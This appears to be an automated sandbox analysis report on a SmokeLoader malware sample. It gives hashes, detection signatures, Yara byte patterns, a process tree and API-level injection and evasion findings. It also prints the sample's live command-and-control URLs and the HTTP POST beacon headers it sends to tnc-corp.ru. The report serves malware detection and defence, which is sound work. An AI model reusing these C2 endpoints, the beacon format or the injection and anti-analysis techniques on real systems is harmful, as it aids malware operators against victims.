
Windows Analysis Report
2Qvkmk7HGr.exe

Overview

General Information

Sample name: 2Qvkmk7HGr.exe (renamed because the original name is a hash value)
Original sample name: 4bb69f9fad0620ecb64971676b9f2cbc.exe
Analysis ID: 1538071
MD5: 4bb69f9fad0620ecb64971676b9f2cbc
SHA1: 519d65503d586d0442ea411d03e790d52b564eee
SHA256: 6ce6a03625c3a1e2b97d490363a3ec5be1706ec424493d7de2c9cad2644c3311
Tags: exe, Stealc, user-abuse_ch

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 2Qvkmk7HGr.exe (PID: 7032 cmdline: "C:\Users\user\Desktop\2Qvkmk7HGr.exe" MD5: 4BB69F9FAD0620ECB64971676B9F2CBC)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • tcgiwaf (PID: 5432 cmdline: C:\Users\user\AppData\Roaming\tcgiwaf MD5: 4BB69F9FAD0620ECB64971676B9F2CBC)
  • tcgiwaf (PID: 5848 cmdline: C:\Users\user\AppData\Roaming\tcgiwaf MD5: 4BB69F9FAD0620ECB64971676B9F2CBC)
  • cleanup
Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
Attribution:
  • SMOKY SPIDER
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://tnc-corp.ru/tmp/index.php", "http://volisc.biz/tmp/index.php", "http://livbev.online/tmp/index.php", "http://liverds.at/tmp/index.php"]}
Source | Rule | Description | Author | Strings
00000000.00000002.1769193164.0000000002101000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000000.00000002.1769193164.0000000002101000.00000004.10000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown
  • 0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1769009336.0000000000560000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000000.00000002.1769009336.0000000000560000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown
  • 0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1768987003.0000000000550000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89

System Summary

Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\user\AppData\Roaming\tcgiwaf, CommandLine: C:\Users\user\AppData\Roaming\tcgiwaf, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\tcgiwaf, NewProcessName: C:\Users\user\AppData\Roaming\tcgiwaf, OriginalFileName: C:\Users\user\AppData\Roaming\tcgiwaf, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\tcgiwaf, ProcessId: 5432, ProcessName: tcgiwaf

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-20T09:38:55.064900+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 55686 | 211.171.233.126 | 80 | TCP
2024-10-20T09:39:16.001247+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 55718 | 211.171.233.126 | 80 | TCP
2024-10-20T09:39:33.091816+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 55719 | 211.171.233.126 | 80 | TCP
2024-10-20T09:39:57.293501+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 55720 | 211.171.233.126 | 80 | TCP
2024-10-20T09:40:22.237445+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 54853 | 211.171.233.126 | 80 | TCP
2024-10-20T09:40:43.105564+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 54854 | 211.171.233.126 | 80 | TCP


AV Detection

Source: 2Qvkmk7HGr.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Avira: detection malicious, Label: HEUR/AGEN.1306978
Source: 00000000.00000002.1769009336.0000000000560000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://tnc-corp.ru/tmp/index.php", "http://volisc.biz/tmp/index.php", "http://livbev.online/tmp/index.php", "http://liverds.at/tmp/index.php"]}
Source: liverds.at | Virustotal: Detection: 5%
Source: livbev.online | Virustotal: Detection: 6%
Source: volisc.biz | Virustotal: Detection: 6%
Source: C:\Users\user\AppData\Roaming\tcgiwaf | ReversingLabs: Detection: 39%
Source: 2Qvkmk7HGr.exe | ReversingLabs: Detection: 39%
Source: 2Qvkmk7HGr.exe | Virustotal: Detection: 41%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Joe Sandbox ML: detected
Source: 2Qvkmk7HGr.exe | Joe Sandbox ML: detected
Source: 2Qvkmk7HGr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_004032A0 GetNumberFormatW,InterlockedIncrement,SetFileAttributesW,GetCommMask,GetNumberFormatW,GetLogicalDriveStringsA,VerifyVersionInfoW,GetComputerNameA,ClearCommError,InterlockedIncrement,EnumTimeFormatsA,GetTempFileNameA,_memset,CommConfigDialogW,ReadConsoleInputA,GetVersionExW,CreateActCtxW,InterlockedExchange,InterlockedExchangeAdd,GetShortPathNameW,GetCurrencyFormatW,GetLocaleInfoW,InterlockedIncrement,SetVolumeMountPointA,GlobalUnWire,CreateSemaphoreW

Networking

Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:54854 -> 211.171.233.126:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:55718 -> 211.171.233.126:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:55719 -> 211.171.233.126:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:55720 -> 211.171.233.126:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:54853 -> 211.171.233.126:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:55686 -> 211.171.233.126:80
Source: C:\Windows\explorer.exe | Network Connect: 211.171.233.126 80
Source: Malware configuration extractor | URLs: http://tnc-corp.ru/tmp/index.php
Source: Malware configuration extractor | URLs: http://volisc.biz/tmp/index.php
Source: Malware configuration extractor | URLs: http://livbev.online/tmp/index.php
Source: Malware configuration extractor | URLs: http://liverds.at/tmp/index.php
Source: Joe Sandbox View | IP Address: 211.171.233.126
Source: Joe Sandbox View | ASN Name: LGDACOMLGDACOMCorporationKR
Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uepnecxbbbdpiq.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 191 | Host: tnc-corp.ru
Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://strnbrsjeqnhidm.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 176 | Host: tnc-corp.ru
Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://amjpnfqmtie.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 268 | Host: tnc-corp.ru
Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lkexyglvlsxrxq.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 317 | Host: tnc-corp.ru
Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kgbmakinbtdtwix.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 209 | Host: tnc-corp.ru
Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://roqbxksriohvi.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 134 | Host: tnc-corp.ru
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (50 identical entries)
Source: global traffic | DNS traffic detected: DNS query: tnc-corp.ru
Source: global traffic | DNS traffic detected: DNS query: volisc.biz
Source: global traffic | DNS traffic detected: DNS query: livbev.online
Source: global traffic | DNS traffic detected: DNS query: liverds.at
Source: unknown | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uepnecxbbbdpiq.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 191 | Host: tnc-corp.ru
Source: explorer.exe, 00000001.00000000.1752481052.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1749862002.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000001.00000000.1752481052.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1749862002.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1752481052.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1749862002.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000001.00000000.1752481052.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1749862002.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1749862002.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000001.00000000.1753482488.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1751138246.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1751529258.0000000008720000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000001.00000000.1758674619.000000000C964000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000001.00000000.1758674619.000000000C893000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1749862002.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1749862002.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1758674619.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1752481052.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1752481052.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1748652192.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1748053995.0000000001240000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1752481052.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1752481052.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1752481052.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1749862002.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1749862002.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000001.00000000.1758674619.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1749862002.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000001.00000000.1758674619.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1758674619.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1758674619.000000000C557000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1758674619.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1749862002.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1749862002.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 00000000.00000002.1769193164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1769009336.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2005144387.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2004823776.0000000000570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

      barindex
Source: 00000000.00000002.1769193164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1769009336.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1768987003.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.2004791838.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.2004938818.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.2005144387.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2004823776.0000000000570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1768955297.0000000000520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: C:\Windows\explorer.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Code function: 0_2_00403054 RtlCreateUserThread,NtTerminateProcess
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Code function: 0_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Code function: 0_2_00402721 NtEnumerateKey,NtClose
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Code function: 0_2_0040158E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Code function: 0_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 5_2_00403054 RtlCreateUserThread,NtTerminateProcess
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 5_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 5_2_00402721 NtEnumerateKey,NtClose
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 5_2_0040158E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 5_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Code function: 0_2_00401A28
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 5_2_00401A28
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_0040D8CA
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_00410CF7
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_004084F9
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_004121FD
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_0041026F
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_004113EF
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_004107B3
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: String function: 00407890 appears 34 times
Source: 2Qvkmk7HGr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
